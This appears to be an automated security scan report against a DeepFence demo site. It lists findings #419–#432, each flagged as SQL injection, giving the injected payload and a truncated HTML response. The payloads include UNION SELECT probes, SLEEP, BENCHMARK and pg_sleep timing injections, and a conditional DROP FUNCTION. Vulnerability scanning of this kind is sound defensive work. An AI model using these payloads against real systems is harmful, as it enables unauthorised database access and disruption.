href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #419\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #420\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #421\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6,7,8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #422\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io IF(7423=7424) SELECT 7423 ELSE DROP \nFUNCTION xcjl--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #423\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io \")) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #424\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #425\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\n#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #426\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #427\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #428\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #429\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 7506=9091 AND ('5913=5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #430\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #431\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #432\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 